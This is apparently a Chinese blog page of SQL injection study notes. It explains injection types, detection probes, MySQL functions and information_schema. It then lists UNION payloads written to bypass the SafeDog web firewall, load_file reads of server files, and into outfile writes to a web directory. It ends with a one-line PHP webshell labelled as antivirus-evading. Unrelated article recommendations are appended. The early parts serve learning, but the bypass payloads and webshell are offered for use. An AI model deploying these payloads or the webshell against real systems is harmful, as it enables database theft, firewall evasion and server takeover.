1.什么是SQL注入攻击

  SQL注入攻击指的是通过构造特殊的输入作为参数插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令

http://www.xxx.com/list.php?id=1
http://www.xxx.com/list.php?id=1 and user()>0 --
  • [ ] 哪里存在sql注入

    GET,POST,HTTP头部注入,Cookie注入,任何客户端可控,传递到服务器的变量
  • [ ]漏洞原理
  1. 程序编写者在处理程序和数据库交互时,使用字符串拼接的方式构造SQL语句
    $sql = "select * from article where id = ".$_GET[1];//使用字符串拼接
  2. 未对用户可控参数进行足够的过滤便将参数内容拼接到SQL语句中。
    $sql = "select * from article where id = $_GET[1]";//传递参数未过滤

2.SQL注入的危害

  • 攻击者利用SQL注入漏洞,可以获取数据库中的多种信息(例如:管理员后台密码),从而脱取数据库中的内容(脱库)。
  • 在特别情况下还可以修改数据库内容或者插入内容到数据库,(多语句联合查询注入)
  • 如果数据库权限分配存在问题,或者数据库本身存在缺陷,那么攻击者可以通过SQL注入漏洞直接获取webshell或者服务器系统权限。(root权限或者sa权限等等)

3.SQL注入的分类

  • 根据数据类型

    $id = $_GET['id'];

    • 整型注入 $sql="select * from article where id = $id"
    • 字符型注入 \(sql="select * from article where id = '\)id'"
  • 根据注入语法
  • UNION query SQL injection(可联合的查询注入)
  • Stacked queries SQL injection(可多语句查询注入)
  • Error-based SQLinjection(报错型注入)
  • Boolean-based blind SQL injection(布尔型注入)
  • Time-based blind SQL injection(基于时间延迟注入)

4.SQL注入的挖掘(编写注入环境代码验证)

  • and 1=1 / and 1=2 根据回显页面不同(整形判断)

  • 单引号判断(')显示数据库错误信息或者页面回显不同(整形,字符串类型判断)

  • (转义符)(适合于字符型注入)

  • -1/+1回显下一个或者上一个页面(整形判断)

  • and sleep(5)(判断页面返回时间)

  • [ ] mysql中四种注释风格


  • /.../

  • /!.../ 内联注释/*!50000select */(mysql版本大于50000执行)

  • [ ] mysql中一些函数

  • system_user()系统用户名

  • user()用户名

  • current_user()当前用户名

  • session_user()连接数据库的用户名

  • database() 数据库名

  • version()MySql数据库版本

  • load_file()MySql读取本地文件的函数

  • @@datadir 读取数据库路径

  • @@basedir MySql安装路径

  • @@version_compile_os 操作系统Windows Server 2003

  • [ ] mysql漏洞利用函数:into outfile()

  • into_outfile()写文件操作

    前提:

    • 文件名必须全路径(绝对路径),
    • 用户必须有写文件的权限
    • 没有对’单引号过滤
  • SELLECT''into outfile'D://phpStudy//WWW//hack.php'

  • [ ] mysql链接 字符串函数

  • concat(str1,str2)

  • concat_ws(separator,str1,str2...)

  • group_concat(str1,str2....)

    • MySql的concat函数可以连接一个或者多个字符串

      • concat(username,0x23,password,0x23...)
      • concat_ws()函数,表示concat with separator,即有分隔符的字符串连接
      • group_concat()函数,把每一行数据分到一个组里显示出来
  • [ ] mysql联合查询注入必备知识点

  • information_schema(mysql5.0)信息数据库。其中保存着关于MySql服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型与访问权限等

  • SCHEMATA表:(所有的数据库名在这个表)提供了当前mysql事例中所有的数据库信息。是show databases的结果取之此表。

  • TABLES表:(所有的数据库的表名在这个表)提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建表的时间等信息。是show tables from schemaname的结果取之此表。

  • COLUMNS表:(所有数据库的表名中的所有列在这个表)提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。

  • [ ] mysql联合查询规则

  • UNION必须由两条或者两条以上的SELECT语句组成,语句之间用关键字UNION分隔

  • UNION中的每个查询必须包含相同的列

  • UNION会从查询结果集中自动去除了重复行

  • [ ]过狗语句

  • ?id=-1 /!50001union//!50001select/1,table_name,3,4,5 /!50001from/ information_schema.tables where table_schema='newbaji'

  • load_file()读取可以单个斜线

    ?id=-1 /!50001union//!50001select/

    1,load_file('d:/pass.txt'),3,4,5

  • into outfile 'd://aaa.txt'(写入必须双//)

    ?id=-1 /!50001union//!50001select/1,'',3,4,5 into outfile 'd:\2.txt';

一句话免杀木马

<?php function dog(){return $_POST[1];}eval(dog());?>

SQL注入原理及绕过安全狗的更多相关文章

  1. Web安全之SQL注入(原理,绕过,防御)

    首先了解下Mysql表结构 mysql内置的information_schema数据库中有三个表非常重要1 schemata:表里包含所有数据库的名字2 tables:表里包含所有数据库的所有的表,默 ...

  2. Java程序员从笨鸟到菜鸟之(一百)sql注入攻击详解(一)sql注入原理详解

    前段时间,在很多博客和微博中暴漏出了12306铁道部网站的一些漏洞,作为这么大的一个项目,要说有漏洞也不是没可能,但其漏洞确是一些菜鸟级程序员才会犯的错误.其实sql注入漏洞就是一个.作为一个菜鸟小程 ...

  3. sql注入原理详解(一)

    我们围绕以下几个方面来看这个问题: 1.什么是sql注入? 2.为什么要sql注入? 3.怎样sql注入? 1.什么是sql注入? 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或 ...

  4. SQL注入9种绕过WAF方法

    SQL注入9种绕过WAF方法 0x01前言 WAF区别于常规 防火墙 是因为WAF能够过滤特定Web应用程序的内容,而常规防火墙则充当服务器之间的防御门.通过检查HTTP的流量,它可以防御Web应用安 ...

  5. 1.sql注入原理

    一.什么是sql注入呢?         所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网站泄露V ...

  6. SQL注入原理与解决方法代码示例

    一.什么是sql注入? 1.什么是sql注入呢? 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令,比如先前的很多影视网 ...

  7. 讲sql注入原理的 这篇不错(有空可以看看)

    我们围绕以下几个方面来看这个问题: 1.什么是sql注入? 2.为什么要sql注入? 3.怎样sql注入? 1.什么是sql注入? 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或 ...

  8. 回头探索JDBC及PreparedStatement防SQL注入原理

    概述 JDBC在我们学习J2EE的时候已经接触到了,但是仅是照搬步骤书写,其中的PreparedStatement防sql注入原理也是一知半解,然后就想回头查资料及敲测试代码探索一下.再有就是我们在项 ...

  9. 网络对抗课题4.3.1 SQL注入原理与实践

    网络对抗课题4.3.1 SQL注入原理与实践 原理 SQL注入漏洞是指在Web应用对后台数据库查询语句处理存在的安全漏洞.也就是,在输入字符串中嵌入SQL指令,在设计程序中忽略对可能构成攻击的特殊字符 ...

随机推荐

  1. 新概念英语(1-31)Where's Sally?

    新概念英语(1-31)Where's Sally? Is the cat climbing the tree ? A:Where is Sally, Jack ? B:She is in the ga ...

  2. Spring Security 入门(3-11)Spring Security 的登录密码验证过程 UsernamePasswordAuthenticationFilter

    认证过程如下 一.先判断请求(请求必须是post请求)地址是否为配置的 login-processing-url 值(默认/j_spring_security_check),如果不是,则放行,进入下一 ...

  3. nohup 与 & 的区别

    nohup -- invoke a utility immune to hangups : 运行命令忽略挂起信号 & 是指后台运行: nohup 的功能和& 之间的功能并不相同.其中, ...

  4. The python debugger(PDB)的简介

    转自:http://www.cnblogs.com/wei-li/archive/2012/05/02/2479082.html 学习Python调试,最好的资料当然是官方文档和(pdb)help了, ...

  5. sort()与sorted()区分开

    列表的排序方法是sort 可用list.sort() sorted()是BIF不能用list.sorted() 引发的异常AttributeError: 'list' object has no at ...

  6. [转]XHR简介

      在XHR诞生前,网页要获取客户端和服务器的任何状态更新,都需要刷新一次,在XHR诞生后就可以完全通过JS代码异步实现这一过程.XHR的诞生也使最初的网页制作转换为开发交互应用,拉开了WEB2.0的 ...

  7. PHP 抓取网页内容的几个函数

    <?php //获取所有内容url保存到文件 function get_index($save_file, $prefix="index_"){ $count = 68; $ ...

  8. MySQL高可用架构之MHA 原理与实践

    MHA简介 关于MHA MHA(Master HA)是一款开源的MySQL的高可用程序,它为MySQL主从复制架构提供了automating master failover 功能.MHA在监控到mas ...

  9. 拥抱开源,Office 365开发迎来新时代

    前言 作为全球最大的开放源代码托管平台,Github在上周迎来了它的十岁生日.自从2008年正式上线以来,Github上面汇聚了数以千万计的开发人员和各种项目,它几乎成为了开源的代名词和风向标,各大软 ...

  10. css 相关算法

    计算 em 目标像素 除 基准像素 等于 em倍数结果: 14 / 16 = 0.875em 0.875倍也就是 14 像素 计算百分比 目标像素 除 父类总宽度 乘 一百:90 / 200 * 10 ...